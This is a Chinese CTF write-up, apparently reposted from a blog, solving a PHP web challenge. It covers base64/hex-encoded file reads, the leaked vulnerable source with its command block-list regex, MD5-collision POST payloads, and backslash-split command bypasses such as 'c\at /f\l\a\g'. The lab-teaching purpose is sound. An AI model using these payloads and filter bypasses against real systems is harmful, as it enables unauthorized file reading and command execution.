打开环境
源码中只有一个md is funny
然后URL有一个img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=
先试试模板注入发现不行,然后伪协议也不行,再爆破目录也不行
所以再试着去把前面的照片先解码了
TXpVek5UTTFNbVUzTURabE5q
base64两次解码得到
3535352e706e67
再16进制转字符串得到
555.png
发现这里应该是突破口
所以我们试着来一下
直接用这个点读flag.php
先16进制编码
再两次base64编码
TmpZMll6WXhOamN5WlRjd05qZzNNQT09
传上去得到
有返回,那说明我们方向对了,但是关键词应该被过滤掉了
那我们试着读其他的 试试hint.php
发现没有提示
那就再试试index.php
确实有东西
进行解码得到
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
echo '<img src ="./ctf3.jpeg">';
die("xixi~ no flag");
} else {
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64," . $txt . "'></img>";
echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
echo("forbid ~");
echo "<br>";
} else {
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("md5 is funny ~");
}
}
?>
重要的是这里
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))
我之前的博客有这个内容
用fastcoll实现这篇文章有讲过
再进行验证
<?php
function readmyfile($path){
$fh=fopen($path,"rb");
$data=fread($fh,filesize($path));
fclose($fh);
return$data;
}
//echo md5( (readmyfile("1.txt")));
//echo '============================';
//echo urlencode(readmyfile("1.txt"));
//echo md5( (readmyfile("2.txt")));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));
if(md5((readmyfile("1.txt"))) === md5((readmyfile("2.txt"))))
{
if ((string)(readmyfile("1.txt")) !== (string)(readmyfile("2.txt")))
echo 1;
else
echo 2;}
else
echo 3;
发现成功绕过
然后把我们的内容进行url编码
<?php
function readmyfile($path){
$fh=fopen($path,"rb");
$data=fread($fh,filesize($path));
fclose($fh);
return$data;
}
//echo md5( (readmyfile("1.txt")));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5( (readmyfile("2.txt")));
echo '============================';
echo urlencode(readmyfile("2.txt"));
//if(md5((readmyfile("1.txt"))) === md5((readmyfile("2.txt"))))
//{if ((string)(readmyfile("1.txt")) !== (string)(readmyfile("2.txt")))
//echo 1;
//else
//echo 2;}
//else
//echo 3;
a=123%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%14%9E%C7%E6G%D6%06%8Bq%3B%AC%93z%1E%FAz%0B%FC%F8%A2%DDX%2FN%03%CAv%A6%2C%2A%16%0B%9B%DD%F8%CB%CA%07%E8%FD%0Bd%F1%9B%3BD%8EI%C7v.%5Db%2C%CDIV%FB%F3%C0%3B1%FD%CB%81NL%14%A5%0F%13%FD%A7%E9%B7%F1Cx%27E%1A%F0%A0%3B%17%F5+b%C1%D7%F5%CC%CD%29%5D.%F5%60%9E%FE%3EJ%AF%16%D3%83%BD%AF%A0-mJ%CE%D3%9B%DF%08%99%F41%22%D7%1E%7E%F4%28%99%7B&&b=123%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%14%9E%C7%E6G%D6%06%8Bq%3B%AC%93z%1E%FAz%0B%FC%F8%22%DDX%2FN%03%CAv%A6%2C%2A%16%0B%9B%DD%F8%CB%CA%07%E8%FD%0Bd%F1%9B%3B%C4%8EI%C7v.%5Db%2C%CDIV%FB%F3%40%3B1%FD%CB%81NL%14%A5%0F%13%FD%A7%E9%B7%F1Cx%27E%1A%F0%A0%BB%17%F5+b%C1%D7%F5%CC%CD%29%5D.%F5%60%9E%FE%3EJ%AF%16%D3%83%BD%AF%A0%ADlJ%CE%D3%9B%DF%08%99%F41%22%D7%1E%FE%F4%28%99%7B
这里cmd过滤了很多东西
但是dir没有被过滤可以直接用
ls的过滤可以用了l\s绕过
我们先查看当前目录
发现成功绕过
说明md5那里很成功
然后进行根目录查看
在burp中如果使用空格会被识别为其他的参数,所以这里空格用%20替换,ls中间使用反斜杠隔开:l\s%20/
dir%20\ 或者l\s%20\
发现flag
所以c\at%20/f\l\a\g
得到flag
希望这篇文章能够帮助你!
转载:https://blog.csdn.net/qq_53460654/article/details/117226102
查看评论